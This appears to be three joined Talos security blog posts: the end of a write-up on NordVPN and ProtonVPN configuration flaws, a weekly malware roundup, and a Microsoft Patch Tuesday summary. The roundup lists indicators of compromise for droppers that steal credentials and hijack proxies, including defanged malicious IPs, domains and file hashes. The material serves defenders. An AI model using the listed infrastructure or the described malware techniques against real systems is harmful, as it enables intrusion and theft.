The new patches developed by the editors are different. For ProtonVPN, they put the OpenVPN configuration file in the installation directory, and a standard user cannot modify it. Thus, we cannot add the malicious string in it. For NordVPN, the editor decided to use an XML model to generate an OpenVPN configuration file. A standard user cannot edit the template.

More details can be found in the vulnerability reports:

• NordVPN report: TALOS-2018-0622 / CVE-2018-3952
• ProtonVPN report: TALOS-2018-0679 / CVE-2018-4010

Tested Versions:

• ProtonVPN VPN Client 1.5.1
• NordVPN 6.14.28.0

Coverage

The following Snort rules will detect exploitation attempts. Additional rules may be released at a future date, and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Console or Snort.org.

Snort Rules: 47035 - 47036

Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Aug. 31 and Sept. 7. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

• Win.Dropper.Generickdz-6671833-0
  Dropper
  This is a BobSoft Delphi application that wraps malware. In the current campaign, the HawkEye spyware is installed. The malware uses process hollowing to keep itself hidden from detection, and achieves persistence across reboots by leveraging an autostart key in the Windows registry.
   
• Win.Dropper.Kovter-6669952-0
  Dropper
  Win.Dropper.Kovter-6669952-0 is a dropper written in Visual Basic. It is distributed via email, and makes use of PowerShell scripts and large objects in the registry to conceal its embedded malware.
   
• Win.Dropper.Upatre-6669126-0
  Dropper
  Win.Dropper.Upatre-6669126-0 is dropped by a Word document in our ThreatGrid sandbox. The sample potentially performs a code injection circumventing Windows' DEP through memory pages allocated with PAGE_EXECUTE_READWRITE permissions.
   
• Doc.Dropper.Valyria-6668024-0
  Dropper
  Doc.Dropper.Valyria-6668024-0 is a malicious Word document that drops malware. The campaign currently spreads the Emotet malware.
   
• Doc.Dropper.Chronos-6667983-0
  Dropper
  This malicious Word document was discovered after it dropped an executable in our ThreatGrid sandbox. The campaign currently delivers a banking trojan, which will redirect internet traffic through the malware's proxy and try to steal banking credentials.
   
• Win.Packed.Generic-6667111-0
  Packed
  This is a Visual Basic executable that will change proxy settings on the victim's machine to inspect internet traffic and thus steal information. It also tries to steal local passwords from the browser's password database.
   

---

Threats

Win.Dropper.Generickdz-6671833-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\33fd244257221b4aa4a1d9e6cacf8474
• <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
• <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4c8f4917d8ab2943a2b2d4227b0585bf
• <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
• <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
• <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
• <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Value Name: MJOXV418GJ

Mutexes

• 8-3503835SZBFHHZ
• 59802CRW6VIZ62Az

IP Addresses

• 141[.]8[.]225[.]75
• 43[.]230[.]143[.]219
• 198[.]46[.]86[.]224
• 122[.]14[.]210[.]142
• 52[.]5[.]251[.]20

Domain Names

• www[.]americasculturalstudies[.]net
• www[.]danhbaviet[.]com
• www[.]kegodanang[.]com
• www[.]www970234[.]com
• www[.]vhecha[.]com
• www[.]sevbizleadservices[.]com

Files and or directories created

• %AppData%\59802CRW\598log.ini
• %AppData%\59802CRW\598logim.jpeg
• %AppData%\59802CRW\598logrc.ini
• %AppData%\59802CRW\598logri.ini
• %AppData%\59802CRW\598logrv.ini
• \TEMP\2995593463.exe

File Hashes

• 00394f8ccd70206920aea6b84cbd14fbfbecd31b9bf7542673793a5c5a35707b
• 02acbf303617a6661d7f4e994e70508bfd22664452bf27a40af78d7d6e811a1c
• 046089a17b9742839f5b173f0bf7694e5326e7dcb1a641357cd79827e75f5c51
• 059e7346e2e8307976cd22f25c51c881d09d11cc59e68e7c7de912ad108c17af
• 0843abfc1b86ea35e3042507656e81ed7edfff6805702bc418189ac3dd5f6f81
• 098766c1ee42b13020947978225d9c48e9666c3b326c1f991daf20cde18fb3e0
• 111b5ab7085c2ab5b75a159eab016668e8c8143b036a8d702be12a69c59be2cd
• 1157af4bb297bce9c745c387cd66ac19ae4d9f7ee4b5e7a63a6af74defdd389d
• 12668eb53e18ed75aaac9e82e5ff5ecbf62dfa3034fd4870bbe33b1abe3c89f6
• 14c8abf43a6cd9337a963f408a8057a880a9c64e383d853829e7f3e4dc354d78
• 178d41ab9c193b735b37f10e3ef74df84da6cf21fc1bd6c322116d71f6afceb5
• 1a4054a1714bb64958e6823aa2418a9317d25b24b20f0666199aceb39b5c1c8f
• 1d4c1dbf89ce24cc7716c9a71a9f8564b93777d715ef484b25fa81bb368c944f
• 1f4018562d03ff36c05bb9c6691eaee8e4e9ff7965799bd8abc557b86037fe2e
• 24a76b75a5d387f434a1f4e0f4cfc2aea7176b293ceb9a9511f0aa0c64191e28
• 29918b68f79c9fb878be4e91dbb81322684b93f0ae9e5743c94de962c7df21ef
• 2a45c9616dd0518b91c14c6ace489938010886acc7a9dd9a0c3280717fc8d76b
• 2b4b76c60b34230544419025df8bde3521435d2224e6b0953f5c9417068f6902
• 2b56221522af3985b09d9ddce4c064a6b157c82698795645a6f5113a177558ff
• 2c867c08a31b7dd9e4b5c82f16c13431e8a739b983b1e065d40d2768575e7676
• 2cf0f40a3edc2df3aa1f7be9cdb7100b91b5f9c32575fd6a5e22aad9fc113546
• 2f62e170384a7960dd937d2242734fd3eddef43ebed31d57d51d69d0eb5ea376
• 315680ac90ad07c9d05301fe99f23e864b1c38cd1950caf9e7f3ca9447b16b13
• 328ba025dadc6148fb83dc34d03b519642de0122d41baabd046133efcfe69eca
• 36b321fd86f75d186e978708789000e45a2a38e436e862c0814524aff5832a8c

Coverage

Screenshots of Detection

AMP



ThreatGrid



Umbrella

Win.Dropper.Kovter-6669952-0

Indicators of Compromise

Registry Keys

• <HKLM>\SOFTWARE\WOW6432NODE\3E00E5E2D21AC4F4EC6F
  • Value Name: CA640AB774DC8DC9D58
• <HKLM>\SOFTWARE\WOW6432NODE\EDXF9XO
  • Value Name: MWZPeJZV
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Value Name: 8567f942

Mutexes

• B3E8F6F86CDD9D8B
• EA4EC370D1E573DA
• A83BAA13F950654C

IP Addresses

• 178[.]137[.]207[.]147
• 68[.]143[.]202[.]61
• 20[.]143[.]75[.]211
• 23[.]175[.]186[.]69
• 130[.]197[.]216[.]217
• 211[.]129[.]1[.]101
• 179[.]8[.]135[.]228
• 27[.]108[.]150[.]40
• 99[.]223[.]4[.]221
• 64[.]94[.]71[.]76
• 89[.]150[.]126[.]91
• 106[.]243[.]136[.]116
• 100[.]246[.]196[.]247

Domain Names

• N/A

Files and or directories created

• %LocalAppData%\Temp\pygjwa3p.ah2.ps1
• %LocalAppData%\Temp\tgzjqzza.auy.psm1
• \TEMP\b9a27f6553f2b34d18b9c1dd49e5877e30a9c9a38147f376b20f2cf9913aabad.exe

File Hashes

• 02ae96fd92bfc617880a78a74775b470530b8a59e4f262f9f2f203df3d37e2e5
• 05f9a381f9effeb6f4fc839190fa4c543e0f1bdcf63fafceeb5db42a987e0f85
• 06215d43b7cddf9072b2f1ff0e8d0706327869253be4517691be138f9aa29268
• 09ee56b008a1b971d845770057eb2f4e775b3706e412d827a1f3e573d78f1cb1
• 0a905d26c03a3cbd88f90f97b5e0849b3ec5b9c25c1992ac0871efd93d9772a5
• 0bf1866ee7b371ea3ffcbe049693010be5f5ab74517256e970383a3449899c52
• 0c7b21d7d7bde5649d9b0a27e5199b3619daa79541ba74d78ccece91be32fadf
• 0d078dd1069c996c028a71c2f10e899ba57530462893976221575ae8002ee87f
• 0dd870a8f9a739f4c0086222ae8c2b1b1d854915a41ddadb7da850a4238be5ea
• 0ec00e8c4277610ef9eeb5a002211b55989fa86272a020a4f1a79da996ed135f
• 0edf3f0a681bd1d63e52e37fd0f97c679c91ec081c122542eb3e62e516523ac5
• 10d2611321e6dd0c1afaa76ffe9c84590e64b99be2411364367728e5075dfdd2
• 11800040629ce430c329e00da4a3ffc58abb3127f4ea2406d5901a72523c20e8
• 11dd6cab51f57bb544e6716c280dc69168a2c6ff1581fde2dc2f8c1b1fcc5f3c
• 12a724b16c05304dcee66991b14c8ca0cc2f3378f5453a1c8dea2bd6211ca95a
• 1756ea4aa42a81db282be52f2286c746e82a9b87c8c9c10e86f921431e4709df
• 184cc70b7587abded0ed5631efbdbd86f9fb8f6095339004b589305040dc0bdf
• 18a7c88bb1278d0cab2e6d5921766bd9896005438a65cb8b5a13546504051d3f
• 1f8496e44016241a59b753bb73b542f703ad6e7ea098d2e50ec348b773248fe3
• 1fc7cb727185acd0e714ab24e36639ff5ecc00958ef62ff7287f64e388d777d3
• 22bada759f4bb6df82936b3572a79f49717dd49d584c48ce89f7b264ba187be5
• 22c56863b80073a1e6a32c508ff5ab4300af300d773e06732dd6666dfc0d7809
• 24dc47adb4ead7d8672a4acba6b6aeb80604237ab85ef40aa9cd2e9abcddfe1b
• 24f462ad25761340aceec33dc166d393e49d8f577ff479d59414f7ecfad49ba1
• 2782831911a60287dd208a98abc012276b32165c04c86ccd43909471a1d557f9

Coverage

Screenshots of Detection

AMP




ThreatGrid

Win.Dropper.Upatre-6669126-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• N/A

IP Addresses

• N/A

Domain Names

• N/A

Files and or directories created

• %LocalAppData%\Temp\vipkewek.exe

File Hashes

• 00d293d627361d3618fa9e362b2ddac1fcf1a04b05a922955433a4c6954a3be7
• 034c2de6a80f13e6ad299baaf194d14747f6b29a1b31c0e4f76505430d2dcfe9
• 04e26fd503240400e6f170f9d58b2a7779d55792353420ba5a69d41d1a336917
• 0dce7497a6ecd7fdeb0507686a599143b50c94b6026fa5d4a9521b511197a811
• 105e7235d88d55a70081661f8faa327bc70a40202158b54c8042dc1ff29bd1ab
• 11c4857c3aea5fc889f39c16a934c975519b1681fcc9fd4c1d8d68fdf6b48ecb
• 18ba26eae4fd5e66b71d0d2fc666c4a5214bca27fc9af00fc9a59be3ac308618
• 1e729c31ef2c631cab9b51dc554c4639c86a627faeacf9f6fb73c50b71dea394
• 26b78a06a970f10e4cf007562c13bbe2d0f0e467681fcf5be0e1770b167dc7b2
• 273610d574c0af8b0d38eefb115c2b7794dab0c898262997f735755503881291
• 2fb5f53517290027fbb94b0c0f639aa8cbb974f726f650bda8ea09ee38a9ce54
• 3199bf691f8a15477f1a5c82e060c80a83bee44d30b6a1874bd7c6e1015e1ec3
• 4cbdcf8cd9e6b5137e1f0917bea59a4af48387ef07239d47ca68806de7f04f2c
• a3dfa314702e5e2d7c9242952b33f80ea17e458704d8e6cff49a79f45e1bc7ed
• ac711b4cc1dd6a307459fe054a1087539e498fd4990867e53c3b8ed85b223e9c
• b1ec88fd601802d028ec2f6e4501c5a7e934dd1a92ed0934a6d5505ac691fe9d
• bd0b11fc2ac479598c102436512cff35712af23384a2d7e4ae0b3c329069017d
• bd1291cb722bcbd10d2c059c672901835d1951d16e35b5091c3b5a44ea081913
• c19c02baf1bd12e1d8fb4cc31d70b34e8a5f9110ac4423677cd82fdaa019c5fc
• e6a75ac727881f772f2dd936b8125de06e3c31f3faa86ff285c5540d671faedf

Coverage

Screenshots of Detection

AMP



ThreatGrid

Doc.Dropper.Valyria-6668024-0

Indicators of Compromise

Registry Keys

• <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}
  • Value Name: WpadDecisionTime
• <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\94-AF-8E-F4-CD-0F
  • Value Name: WpadDecisionReason
• <HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS
  • Value Name: ld3

Mutexes

• Global\I98B68E3C
• Global\M98B68E3C
• PEM1E4
• PEM1A0
• PEM9C8

IP Addresses

• 69[.]201[.]131[.]220
• 66[.]115[.]238[.]16
• 67[.]222[.]19[.]143
• 213[.]123[.]182[.]53
• 138[.]128[.]170[.]114
• 198[.]71[.]233[.]104
• 128[.]2[.]97[.]187
• 103[.]215[.]137[.]24
• 200[.]58[.]111[.]124
• 8[.]39[.]54[.]102
• 211[.]100[.]47[.]32
• 62[.]254[.]26[.]235
• 151[.]236[.]32[.]35

Domain Names

• blog[.]bctianfu[.]cn
• tropicalislandrealtyofflorida[.]com
• smtp[.]office365[.]com
• mail[.]vcacademy[.]lk
• mail[.]lareservasuites[.]com
• imap[.]1and1[.]co[.]uk
• mail[.]serviciodecorreo[.]es
• mail[.]1and1[.]es
• mail[.]billsmachinesvc[.]com
• mail[.]royalholidaypalace[.]com
• mail[.]goodleathergroup[.]com
• mail[.]tlb[.]sympatico[.]ca
• smtp[.]gmail[.]com

Files and or directories created

• \efsrpc
• %UserProfile%\707.exe
• %WinDir%\SysWOW64\LDCjSm5OOdIv.exe
• %LocalAppData%\Temp\zzdz1frv.zq1.psm1
• %LocalAppData%\Temp\idwlwvc1.j0h.ps1
• %WinDir%\SysWOW64\nZJz1AtlwhH6.exe

File Hashes

• 1027dcf0ac13ba9da3a74edd293537bb91a0aa56a6bc35037dd07d0e7c134785
• 10def6ce3d027c88fdd6d14f8d48cbcf1bea538c6c5d7bba1535b7da8538d625
• 115e66ae406dc1849e4436bd5123aa11a23140d0e5499df0db4a79bc54d9b0a2
• 19299ca446bd6e4f35f779b6645e754c447b4b3c3eff47b52ed35dc2f4b9c33a
• 204fade0f54fcc7004a5c92e267c4b10f2c7e34abe2c23d81148a1da050cd0c4
• 20b3fd1e9b961bd1ebf99ef2acaf836fd222e7e8e275ee5fe98d147007956476
• 2411c862c3a10016a8c77ca30260edd0b1578681b2c0e7efb283305d1a06a2d6
• 24e266c12f9624da9ffb2dfe7ee7ed47aeba644f269389ff65360b2ffdfa665b
• 26af093d1ec8917ad9e3bdfeb0bb6d0d03d29f936f61e3f3d5f54b3758934cff
• 2b849aca5039234ac9b5e82e02f1c4f4aef45722f76acb1a340a6077f53f5c30
• 352db4336e0b680ceede9e99aac261e4181201d1cad868215986cd54f2391efa
• 36f67278cb1b1667ca13192886f46a2a446a77a87718ba41db95c60493bb33e8
• 37832082f728da1bacdf336f3781f3fbc2678bb7231369eaffd4bc4c6444c64d
• 3b738dd4585e5b66bb122670c9e84042111999c9e20e62b0e5e52d475e5b5f5b
• 4bfb545cbbae97c960f49c26525ac7b138049f1921d007b597c0196a4d9d36ec
• 4ce483f322ebfbcb4860fa610b9b4b1970423901ae8df689cf5363fa4306a353
• 4e6b73e7da25b55ddfd245bfba2edd5a184c8b4ad7e5580ba592be66006b0264
• 4f73d7c59c7f1373e99d93cc4ba0babbe1fcc366269c427753b4a431ad97af8a
• 584f0539d4110583adacb68d2e38d05164aeeabfec95a0826c3a495dd41059c4
• 61d340302fafed7644737b27631807d326d68acec8c32462adb5be6668af3a1a
• 6a85007df58be36c0a7010cd2e153a5949af8e54575a5f3633fbd1e73ec0672c
• 6d25187f8c2b1d9dbd4ec7daa8239839acd599c263ef5a7d1892be7c755e6209
• 6d4da277bb48fa1afdeb949e7a806ed3b02dd738c824aa64b4992b5b05ecd23f
• 7282cdd99960d70cd2baa1526b15aa59a5983c0de21d6b3e65bfd9b140975175
• 745d9941a7ac2aa275e81dbcbdf4288cc6a04f9e480318ad3c43cad77131473e

Coverage

Screenshots of Detection

AMP





ThreatGrid




Umbrella

Doc.Dropper.Chronos-6667983-0

Indicators of Compromise

Registry Keys

• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBT\PARAMETERS\INTERFACES\TCPIP_{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
  • Value Name: DhcpNetbiosOptions
• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBT\PARAMETERS\INTERFACES\TCPIP_{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
  • Value Name: DhcpNameServerList
• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
  • Value Name: DhcpDefaultGateway
• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
  • Value Name: DhcpNameServer
• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
  • Value Name: DhcpDefaultGateway
• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
  • Value Name: DhcpSubnetMaskOpt
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates
• <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\Root
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\Certificates
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CRLs
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CTLs
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\Certificates
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CRLs
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CTLs
• <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
  • Value Name: DefaultConnectionSettings
• <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
  • Value Name: ProxyEnable
• <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
  • Value Name: ProxyServer
• <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
  • Value Name: ProxyOverride
• <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
  • Value Name: AutoConfigURL
• <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
  • Value Name: AutoDetect
• <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
  • Value Name: SavedLegacySettings
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
  • Value Name: ProxyBypass
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
  • Value Name: IntranetName
• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
  • Value Name: DhcpInterfaceOptions

Mutexes

• Global\I98B68E3C
• Global\M98B68E3C
• PEM1A4
• PEM558
• PEM948
• PEMBE4

IP Addresses

• 68[.]203[.]247[.]140
• 124[.]121[.]192[.]186
• 176[.]219[.]82[.]79
• 173[.]236[.]55[.]90
• 185[.]129[.]3[.]211
• 24[.]253[.]16[.]214
• 189[.]253[.]126[.]66

Domain Names

• withachoice[.]com

Files and or directories created

• %System32%\config\SYSTEM.LOG1
• %LocalAppData%\Temp\5jhjztfi.inm.psm1
• %LocalAppData%\Temp\dgnniruc.yui.ps1
• %UserProfile%\Documents\20180906\PowerShell_transcript.PC.s2CSwKhg.20180906171831.txt
• %UserProfile%\157.exe

File Hashes

• 04bec30f4761ffc717d2dba340c124c37ac85fb926972eb80c0aeb7e34a0b5e5
• 218ae537669d9dfd02ccf61ca948acef60fdf89104d3e2ef03dcececdb9babbe
• 54580f2ca416dd89565e0286ddb05c7aed1a5aceeca2766928aa6b90a63f4c34
• 6969b1dba448683c5b5cfdfe4ccdb9fac72e5e1b67f4534027202571e2b81c15
• 6bb5037a3a338bea45c96563bd6497a331a9f6efa96bbc5f6536ebc623e7ebb5
• 79765635b755992b9035560d4e00b550c3690c4a75d4e022b5998f11db4db738
• 81925e948f9d7d14fe216c3513e9085996d0f9ba1208b0f3e0a2cb69a1843b2f
• 9c089c555d580ac18b55b2874e92232c5dc86517904ae107ad79cbaf945170d7
• 9fff7343b067f08e84ff62c3c6c70d514847c19092a07b9d55c6b42025108ff0
• a0d51ee8ab2770a2587ccc1ad99286463c919a0300010a48b4278594e560f30b
• a3d5721ae44c6ee97fcffe4d40599fab488d981b6240b8e4514bd744d09990c5
• bccc98a17302f93b04fddd810bfc194b6382ed6b36fe58c3f8f401e58d36d2be
• d0bdb2938216c29798bfb752f10c72922b9d8f19f81d838d935f12912ebe23b6

Coverage

Screenshots of Detection

AMP




ThreatGrid

Win.Packed.Generic-6667111-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Value Name: internat.exe
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
  • Value Name: ProxyBypass
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
  • Value Name: IntranetName
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
  • Value Name: IntranetName
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
  • Value Name: UNCAsIntranet
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
  • Value Name: AutoDetect
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
  • Value Name: ProxyEnable
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
  • Value Name: ProxyServer
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
  • Value Name: ProxyOverride
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
  • Value Name: AutoConfigURL
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
  • Value Name: AutoDetect
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
  • Value Name: SavedLegacySettings
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
  • Value Name: DefaultConnectionSettings
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Value Name: invidiadriver

Mutexes

• N/A

IP Addresses

• N/A

Domain Names

• rapidgens[.]info

Files and or directories created

• %LocalAppData%\Temp\AFUVT.bat
• %LocalAppData%\Temp\AFUVT.txt
• %AppData%\system32\intelgfx.exe
• %LocalAppData%\Temp\LFPKG.exe

File Hashes

• 01856d473c35bfe514c75fcab72b65a38795ee257cbab923a9fbc6ec6048bea8
• 01cee3dae8d1578107a5229e51cf491d8ec67891f11b41b11df4bcf4f7dfa033
• 01ecd0f01d99fa67cde837666df5eb89b81876f3f272b77cd9599950f52dcda1
• 034ac9f6da8dc800ba756c56db6d412ca56ca80bf8809014eb13311e47ed3d0e
• 044e60eea0295cc8a7d899f194ec94a642e4dc9f344971a7b4e2b62bcbd52589
• 0466a2a72c2a9b573e18f9f2d6acd5a319ce3e78c8fad29e751c9fe86b0de6ae
• 047e9ee436182dd252d40aa1ba48eb4da2f03575080f054303a07c52801dd4f0
• 06283385bae75ca1771192347384d498df104f57feb89fed273a2c90d45173f1
• 06f5bbf71529e4ee25f23ccc117e1db3cb49a2ad31df2573882e2cdf2b9c5a0e
• 097da1809fcd49df77925fdb4f8eba77a5ccc888b7d3856101cdd0a2700f2aca
• 099b04e2c212aceb3851c2532fc57cb59f12cf574a7ce79d3c609e3bd4145db7
• 0a75f754c2fb13fa8f006ea3781119fe2e48d8fbe516782f658f9e39431f2466
• 0c93afa3ca6e94e7a97075e7a187e66b060f0e6b520fb3398b69dbd83d14ed7e
• 0d4d97ddf1d86e17df6203f777f994f162a55aea1eeb3908df1e29b697324c62
• 0d615bec997e4e9f02a698cd3faf0985f24aa28ecead3e5ee1a8e2602e2f9a9d
• 0fb822636382d6c306ee21efa4b1a4f0a8e0d4b5e22b704934cef706fcd24de4
• 1045a01bc6e0bf8bab6c0b51d5ceb8840485a02b698ab3b691466e0e646863ac
• 11481494804da9f301b47ec5a4caa3e6479e9cf901b54633d4114c7d7706e254
• 11cb98ac7c0b4b3dce3831ab511c09f8d8d958ef41396b2ef93121b28ac4aa6f
• 12b84d0786d49c283d7a3dc3c985af8ff371b133b6b8301cab3c2bf839f2ce42
• 16c0224bbe0e0bb43002fb7f83f8c6eaba16b0873d3455a570f58cc89fa0d762
• 1822abcaf9005035798b30c09ff722fe2815f298615c5c59f1fb6cb278301161
• 19456f5162d26996cfc2adf9b7627e4b7566f6fe600cde3764c71523f2dc795a
• 1a0a601961f2c46525ebdc772126c0fb4f7802b533033f15a5e6217c5f266aca
• 1b7d7642e95d7d9152b4d8e8c59d7e1d7000996999c62f45d9a51c50d00f1833

Coverage

Screenshots of Detection

AMP




ThreatGrid

Microsoft released its monthly set of security updates today for a variety of its products that address a variety of bugs. The latest Patch Tuesday covers 61 vulnerabilities, 17 of which are rated "critical," 43 that are rated "important" and one that is considered to have "moderate" severity.

The advisories cover bugs in the Internet Explorer web browser, Jet Database Engine and the Chakra scripting engine, among other products and software.

This update also includes two critical advisories, one of which covers security updates to Adobe Flash, and another that deals with a denial-of-service vulnerability in the Microsoft Windows operating system.

Critical vulnerabilities

Microsoft released coverage for 17 critical bugs. Cisco Talos believes 16 of these are of special importance and need to be addressed by users immediately.

CVE-2018-0965 is a remote code execution vulnerability in the Windows Hyper-V hypervisor. An attacker can exploit this vulnerability by running a specially crafted application on a guest system that would cause the system operating Hyper-V to execute arbitrary code. The flaw lies in the way that Hyper-V validates inputs from an authenticated user on a guest OS.

CVE-2018-8367 is a remote code execution vulnerability in the Chakra scripting engine. The engine improperly handles objects in memory in the Microsoft Edge web browser that could allow an attacker to corrupt the system's memory and execute arbitrary code with the user's credentials.

CVE-2018-8420 is a remote code execution vulnerability in Microsoft XML Core Services MSXML. An attacker could trick the user into visiting a specially crafted, malicious website designed to invoke MSXML through a web browser, allowing the attacker to eventually run code and take control of the user's system.

CVE-2018-8461 is a remote code execution vulnerability in Internet Explorer that exists when the web browser improperly accesses objects in memory. This bug could corrupt memory in a way that an attacker could execute arbitrary code with the same rights as the current user. A user would need to visit a specially crafted, malicious website to trigger this vulnerability.

CVE-2018-8475 is a remote code execution vulnerability in Windows OS, which exists due to the image-loading functionality improperly handling malformed image files. An attacker could exploit this bug by convincing a user to load a malformed image file from either a web page, email or other method.

CVE-2018-8332 is a remote code execution vulnerability in the Windows font library. There are multiple ways in which an attacker could exploit this flaw, including convincing the user to click on a malicious web page or providing the user with a specially crafted, malicious document.

CVE-2018-8391 is a remote code execution vulnerability in the Chakra scripting engine. An attacker can exploit this flaw if a user is logged on with an administrative account.

CVE-2018-8439 is a remote code execution vulnerability in the Windows Hyper-V hypervisor. The bug exists in Hyper-V's validation on a host server. An attacker can exploit this flaw by running a specially crafted application on a guest operating system that could lead to the machine running Hyper-V executing arbitrary code.

CVE-2018-8447 is a remote code execution vulnerability in Internet Explorer. An attacker could exploit this vulnerability by tricking a user into visiting a specially crafted web page while using the Internet Explorer browser, or by taking advantage of a compromised website through advertisements or attachments that the user would have to click on.

CVE-2018-8456 and CVE-2018-8459 are remote code execution vulnerabilities that exist in the Chakra scripting engine's handling of objects in memory. This bug could corrupt memory in a way that an attacker could execute arbitrary code with the same rights as the current user.

CVE-2018-8457 is a remote code execution vulnerability that exists in the way Microsoft web browsers' scripting engines handle objects in memory. An attacker could host a specially crafted website to exploit this vulnerability, and then convince the user to visit the website while using a Microsoft web browser, or they could embed an ActiveX control that is marked "safe for initialization" in a Microsoft Office file or an application that hosts the browser's rendering engine.

